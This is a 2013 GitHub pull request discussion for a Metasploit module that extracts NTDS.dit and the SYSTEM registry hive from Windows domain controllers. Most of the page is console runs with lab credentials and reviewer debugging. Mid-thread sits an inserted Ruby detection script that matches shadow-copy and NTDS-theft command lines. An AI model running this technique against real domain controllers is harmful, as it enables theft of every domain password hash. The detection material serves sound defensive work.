Added Auxiliary Module ntdsgrab.rb #1574

Merged
merged 28 commits into from Mar 14, 2013

Conversation

R3dy
Contributor

@R3dy R3dy commented Mar 10, 2013

This module uses the psexec Mixin to extract NTDS.dit and the SYSTEM registry hive from a Windows Domain Controller.

Reference:
http://blog.accuvant.com/blog/owning-computers-without-shell-access

The module can be used in three separate ways.

Check if a volume shadow copy already exists and pull from there:

msf  auxiliary(ntdsgrab) > run

[*] 10.0.10.132:445 - Checking if a Volume Shadow Copy exists already.
[+] 10.0.10.132:445 - Volume Shadow Copy exists on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy74
[*] 10.0.10.132:445 - Checking if NTDS.dit was copied.
[*] Downloading ntds.dit file
[*] Downloading SYSTEM hive file
[*] 10.0.10.132:445 - Executing cleanup...
[*] 10.0.10.132:445 - Cleanup was successful
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Create a new Volume Shadow Copy and pull from there:

msf  auxiliary(ntdsgrab) > set CREATE_NEW_VSC true
CREATE_NEW_VSC => true
msf  auxiliary(ntdsgrab) > run

[*] Creating Volume Shadow Copy
[+] Volume Shadow Copy created on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy75
[*] 10.0.10.132:445 - Checking if NTDS.dit was copied.
[*] Downloading ntds.dit file
[*] Downloading SYSTEM hive file
[*] 10.0.10.132:445 - Executing cleanup...
[*] 10.0.10.132:445 - Cleanup was successful
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Target a specific user-defined Volume Shadow Copy and pull from there:

msf  auxiliary(ntdsgrab) > set VSCPATH '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy70'
VSCPATH => \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy70
msf  auxiliary(ntdsgrab) > run

[*] 10.0.10.132:445 - Attempting to copy NTDS.dit from \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy70
[*] 10.0.10.132:445 - Checking if NTDS.dit was copied.
[*] Downloading ntds.dit file
[*] Downloading SYSTEM hive file
[*] 10.0.10.132:445 - Executing cleanup...
[*] 10.0.10.132:445 - Cleanup was successful
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@R3dy
Contributor Author

R3dy commented Mar 10, 2013

Alright, I can't figure out how to get rid of this data from a previous pull request. Hopefully it doesn't matter :)

@L1ghtn1ng
Contributor

Please add the license terms at the very top of the module; see another module for an example.

@todb-r7

todb-r7 commented Mar 11, 2013

Alright I can't figure out how to get rid of this data from a previous pull request.

You're right, it shouldn't matter at all, assuming everything merges cleanly at the end. History is important.

@jlee-r7
Contributor

jlee-r7 commented Mar 11, 2013

This shouldn't be a scanner.


register_options([
  OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
  OptString.new('LOGDIR', [true, 'Directory on local system used to store the ntds.dit and SYSTEM hive', '/tmp/NTDS_Grab']),
Contributor

I don't think it is the best way to store the ntds.dit and SYSTEM hive.

My feeling is store_loot could be used to store them, and in this way you can also track collected loots/objects in the db if you're using it.

Any inconvenience with using store_loot here?

Contributor Author

I will look into store_loot. The only reason I did it this way was so that I could use a separate tool that I built, ntds_hashextract.rb, to retrieve the Active Directory password hashes, and it is convenient for the two files to be in the same directory. Can this be achieved with store_loot?

Contributor

store_loot puts everything under ~/.msf4/loot/ but that may not always be the case.

@jvazquez-r7
Contributor

Deployed a single DC and tried

msf  auxiliary(ntdsgrab) > show options

Module options (auxiliary/admin/smb/ntdsgrab):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CREATE_NEW_VSC  false            no        If true, attempts to create a volume shadow copy
   RHOST           192.168.1.133    yes       The target address
   RPORT           445              yes       Set the SMB service port
   SMBDomain       SMALLBUSINESS    no        The Windows domain to use for authentication
   SMBPass         juan             no        The password for the specified username
   SMBSHARE        C$               yes       The name of a writeable share on the server
   SMBUser         Administrator    no        The username to authenticate as
   VSCPATH                          no        The path to the target Volume Shadow Copy
   WINPATH         WINDOWS          yes       The name of the Windows directory (examples: WINDOWS, WINNT)

msf  auxiliary(ntdsgrab) > run

[*] 192.168.1.133:445 - Checking if a Volume Shadow Copy exists already.
[+] 192.168.1.133:445 - Volume Shadow Copy exists on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[*] 192.168.1.133:445 - Checking if NTDS.dit was copied.
[-] 192.168.1.133:445 - Failed to find a volume shadow copy.  Issuing cleanup command sequence.
[*] 192.168.1.133:445 - Executing cleanup...
[*] 192.168.1.133:445 - Cleanup was successful
[*] Auxiliary module execution completed

Any clue about what could be wrong? (I've checked that ntds.dit exists in c:\windows\ntds\ntds.dit.)

Feel free to ask me to provide any information.

@R3dy
Contributor Author

R3dy commented Mar 12, 2013

By any chance could you try running it with CREATE_NEW_VSC set to 'true' and tell me if there is any difference?

Thanks!

@jvazquez-r7
Contributor

Sure, successful with CREATE_NEW_VSC as true:

msf  auxiliary(ntdsgrab) > show options

Module options (auxiliary/admin/smb/ntdsgrab):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CREATE_NEW_VSC  true             no        If true, attempts to create a volume shadow copy
   RHOST           192.168.1.134    yes       The target address
   RPORT           445              yes       Set the SMB service port
   SMBDomain       SMALLBUSINESS    no        The Windows domain to use for authentication
   SMBPass         juan             no        The password for the specified username
   SMBSHARE        C$               yes       The name of a writeable share on the server
   SMBUser         Administrator    no        The username to authenticate as
   VSCPATH                          no        The path to the target Volume Shadow Copy
   WINPATH         WINDOWS          yes       The name of the Windows directory (examples: WINDOWS, WINNT)

msf  auxiliary(ntdsgrab) > run

[*] Creating Volume Shadow Copy
[+] Volume Shadow Copy created on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
[*] 192.168.1.134:445 - Checking if NTDS.dit was copied.
[*] Downloading ntds.dit file
[*] Downloading SYSTEM hive file
[*] 192.168.1.134:445 - Executing cleanup...
[*] 192.168.1.134:445 - Cleanup was successful
[*] Auxiliary module execution completed

@R3dy
Contributor Author

R3dy commented Mar 13, 2013

Ok so here is what I would like you to try next if you don't mind.

Try it again with CREATE_NEW_VSC set to false and tell me if it works. My guess is that it will work and I had an off-by-one error whereby my check to see if a VSC is present requires there to be at least two, and in this case, when you spun up a new DC that has only one shadow copy, my off-by-one triggered a false negative.

If you try it again and it still produces the same error, can you check for me in the c:\windows\temp directory and tell me if there is a file called "ntds" and/or "sys"?

Thanks man!
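The technique the module automates (reusing or creating a Volume Shadow Copy, copying NTDS.dit and the SYSTEM hive out of it, and staging them under c:\windows\temp as discussed above) leaves host-side artifacts a defender can alert on. The following is an added example, not part of this pull request or the Metasploit module: a small Ruby detection pass over constructed process-creation events. The event field layout, host names, user names and command lines are constructed assumptions; the page does not show which commands the module actually issues on the DC.

```ruby
# Added example: detect the host-side artifacts of shadow-copy-based NTDS.dit theft
# in constructed Windows process-creation events. Field layout, hosts, users and
# command lines below are made up for this example; they are not from the module.
SAMPLE_EVENTS = [
  'EventID=4688 Host=DC01 User=SMALLBUSINESS\\Administrator CommandLine="vssadmin create shadow /for=C:"',
  'EventID=4688 Host=DC01 User=SMALLBUSINESS\\Administrator CommandLine="cmd /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\WINDOWS\\NTDS\\ntds.dit C:\\WINDOWS\\Temp\\ntds"',
  'EventID=4688 Host=DC01 User=SMALLBUSINESS\\Administrator CommandLine="cmd /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\WINDOWS\\System32\\config\\SYSTEM C:\\WINDOWS\\Temp\\sys"',
  'EventID=4688 Host=WS07 User=SMALLBUSINESS\\alice CommandLine="notepad.exe report.txt"',
  'EventID=4688 Host=FS01 User=SMALLBUSINESS\\backupsvc CommandLine="vssadmin create shadow /for=D:"'
].freeze

# One rule per artifact; each regex is applied to the parsed CommandLine field.
RULES = {
  'shadow_copy_created'               => /\bvssadmin(?:\.exe)?\s+create\s+shadow\b/i,
  'ntds_read_from_shadow_copy'        => /HarddiskVolumeShadowCopy\d+\\.*\bntds\.dit\b/i,
  'system_hive_read_from_shadow_copy' => /HarddiskVolumeShadowCopy\d+\\.*\\config\\SYSTEM\b/i,
  'ad_secrets_staged_in_temp'         => /\\Windows\\Temp\\(?:ntds|sys)\b/i
}.freeze

# Parse key=value pairs; a value may be a double-quoted string containing spaces.
def parse_event(line)
  fields = {}
  line.scan(/(\w+)=("([^"]*)"|\S+)/) { |key, raw, quoted| fields[key] = quoted || raw }
  fields
end

# Names of every rule that fires on a single command line, in RULES order.
def matched_rules(command_line)
  RULES.select { |_, re| re.match?(command_line) }.keys
end

# One alert per event that triggers at least one rule.
def scan(events)
  events.map { |line| parse_event(line) }
        .map { |ev| { host: ev['Host'], user: ev['User'], command: ev['CommandLine'],
                      rules: matched_rules(ev['CommandLine'].to_s) } }
        .reject { |alert| alert[:rules].empty? }
end

# Correlate per host: a shadow copy created and then mined for NTDS.dit or the SYSTEM
# hive is the pattern this module produces; creation alone is routine backup activity.
def severity_by_host(alerts)
  alerts.group_by { |a| a[:host] }.transform_values do |host_alerts|
    rules = host_alerts.flat_map { |a| a[:rules] }.uniq
    secrets_touched = (rules - ['shadow_copy_created']).any?
    if rules.include?('shadow_copy_created') && secrets_touched then 'high'
    elsif secrets_touched then 'medium'
    else 'low'
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  alerts = scan(SAMPLE_EVENTS)
  alerts.each { |a| puts "#{a[:host]} #{a[:user]}: #{a[:rules].join(', ')}" }
  severity_by_host(alerts).each { |host, sev| puts "#{host}: #{sev}" }
end
```

Running it rates DC01 'high' (shadow copy created, then both secrets read from it and staged in Temp) and FS01 'low' (shadow copy creation alone).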

@jvazquez-r7
Contributor

Setting it again to false works :)

msf  auxiliary(ntdsgrab) > show options

Module options (auxiliary/admin/smb/ntdsgrab):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CREATE_NEW_VSC  true             no        If true, attempts to create a volume shadow copy
   RHOST           192.168.1.134    yes       The target address
   RPORT           445              yes       Set the SMB service port
   SMBDomain       SMALLBUSINESS    no        The Windows domain to use for authentication
   SMBPass         juan             no        The password for the specified username
   SMBSHARE        C$               yes       The name of a writeable share on the server
   SMBUser         Administrator    no        The username to authenticate as
   VSCPATH                          no        The path to the target Volume Shadow Copy
   WINPATH         WINDOWS          yes       The name of the Windows directory (examples: WINDOWS, WINNT)

msf  auxiliary(ntdsgrab) > set CREATE_NEW_VSC false
CREATE_NEW_VSC => false
msf  auxiliary(ntdsgrab) > run

[*] 192.168.1.134:445 - Checking if a Volume Shadow Copy exists already.
[+] 192.168.1.134:445 - Volume Shadow Copy exists on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
[*] 192.168.1.134:445 - Checking if NTDS.dit was copied.
[*] Downloading ntds.dit file
[*] Downloading SYSTEM hive file
[*] 192.168.1.134:445 - Executing cleanup...
[*] 192.168.1.134:445 - Cleanup was successful
[*] Auxiliary module execution completed

@R3dy
Contributor Author

R3dy commented Mar 13, 2013

I am unable to replicate this error. If you try it again on a fresh DC do you still get the same error? I have deleted all Volume Shadow copies on my system to see if that was the issue and it is still working.

@jvazquez-r7
Contributor

Tried again in a fresh DC:

msf  auxiliary(ntdsgrab) > run

[*] 192.168.1.135:445 - Checking if a Volume Shadow Copy exists already.
[*] 192.168.1.135:445 - No VSC Found.
[*] Creating Volume Shadow Copy
[+] Volume Shadow Copy created on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[*] 192.168.1.135:445 - Checking if NTDS.dit was copied.
[*] Downloading ntds.dit file
[*] Downloading SYSTEM hive file
[*] 192.168.1.135:445 - Executing cleanup...
[*] 192.168.1.135:445 - Cleanup was successful
[*] Auxiliary module execution completed

Weird :s, now it's working on the first shot...

OK, will give it a new and last shot tomorrow; if it works, after a last code cleanup I think we'll be ready to merge :)

thanks!

rescue StandardError => sysdownloaderror
  print_error("Unable to download SYSTEM hive: #{sysdownloaderror}")
  return sysdownloaderror
end
Contributor

Isn't a simple.disconnect("\#{ip}#{@SMBSHARE}") needed here, as in download_ntds? Just asking :)

Contributor Author

Yes there should be, fixed.

@jvazquez-r7 jvazquez-r7 merged commit abbb3b2 into rapid7:master Mar 14, 2013
@jvazquez-r7
Contributor

Did last cleanup:

7403239

And tested with an existing VSC and creating a new one. Working, so merged! Thanks @R3dy !!

msf  auxiliary(psexec_ntdsgrab) > show options

Module options (auxiliary/admin/smb/psexec_ntdsgrab):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CREATE_NEW_VSC  false            no        If true, attempts to create a volume shadow copy
   RHOST                            yes       The target address
   RPORT           445              yes       Set the SMB service port
   SMBDomain       WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                          no        The password for the specified username
   SMBSHARE        C$               yes       The name of a writeable share on the server
   SMBUser                          no        The username to authenticate as
   VSCPATH                          no        The path to the target Volume Shadow Copy
   WINPATH         WINDOWS          yes       The name of the Windows directory (examples: WINDOWS, WINNT)

msf  auxiliary(psexec_ntdsgrab) > set rhost 192.168.1.135
rhost => 192.168.1.135
msf  auxiliary(psexec_ntdsgrab) > set SMBDomain SMALLBUSINESS
SMBDomain => SMALLBUSINESS
msf  auxiliary(psexec_ntdsgrab) > set SMBPass juan
SMBPass => juan
msf  auxiliary(psexec_ntdsgrab) > set SMBUser Administrator
SMBUser => Administrator
msf  auxiliary(psexec_ntdsgrab) > run

[*] 192.168.1.135:445 - Checking if a Volume Shadow Copy exists already.
[+] 192.168.1.135:445 - Volume Shadow Copy exists on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[*] 192.168.1.135:445 - Checking if NTDS.dit was copied.
[*] 192.168.1.135:445 - Downloading ntds.dit file
[+] 192.168.1.135:445 - ntds.dit stored at /Users/juan/.msf4/loot/20130314133631_default_192.168.1.135_psexec.ntdsgrab._378404.dit
[*] 192.168.1.135:445 - Downloading SYSTEM hive file
[+] 192.168.1.135:445 - SYSTEM hive stored at /Users/juan/.msf4/loot/20130314133633_default_192.168.1.135_psexec.ntdsgrab._264239.bin
[*] 192.168.1.135:445 - Executing cleanup...
[*] 192.168.1.135:445 - Cleanup was successful
[*] Auxiliary module execution completed
msf  auxiliary(psexec_ntdsgrab) > file /Users/juan/.msf4/loot/20130314133631_default_192.168.1.135_psexec.ntdsgrab._378404.dit
[*] exec: file /Users/juan/.msf4/loot/20130314133631_default_192.168.1.135_psexec.ntdsgrab._378404.dit

/Users/juan/.msf4/loot/20130314133631_default_192.168.1.135_psexec.ntdsgrab._378404.dit: data
msf  auxiliary(psexec_ntdsgrab) > file /Users/juan/.msf4/loot/20130314133633_default_192.168.1.135_psexec.ntdsgrab._264239.bin
[*] exec: file /Users/juan/.msf4/loot/20130314133633_default_192.168.1.135_psexec.ntdsgrab._264239.bin

/Users/juan/.msf4/loot/20130314133633_default_192.168.1.135_psexec.ntdsgrab._264239.bin: MS Windows registry file, NT/2000 or above
msf  auxiliary(psexec_ntdsgrab) > set CREATE_NEW_VSC true
CREATE_NEW_VSC => true
msf  auxiliary(psexec_ntdsgrab) > run

[*] 192.168.1.135:445 - Creating Volume Shadow Copy
[+] 192.168.1.135:445 - Volume Shadow Copy created on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
[*] 192.168.1.135:445 - Checking if NTDS.dit was copied.
[*] 192.168.1.135:445 - Downloading ntds.dit file
[+] 192.168.1.135:445 - ntds.dit stored at /Users/juan/.msf4/loot/20130314133722_default_192.168.1.135_psexec.ntdsgrab._291883.dit
[*] 192.168.1.135:445 - Downloading SYSTEM hive file
[+] 192.168.1.135:445 - SYSTEM hive stored at /Users/juan/.msf4/loot/20130314133726_default_192.168.1.135_psexec.ntdsgrab._791823.bin
[*] 192.168.1.135:445 - Executing cleanup...
[*] 192.168.1.135:445 - Cleanup was successful
[*] Auxiliary module execution completed
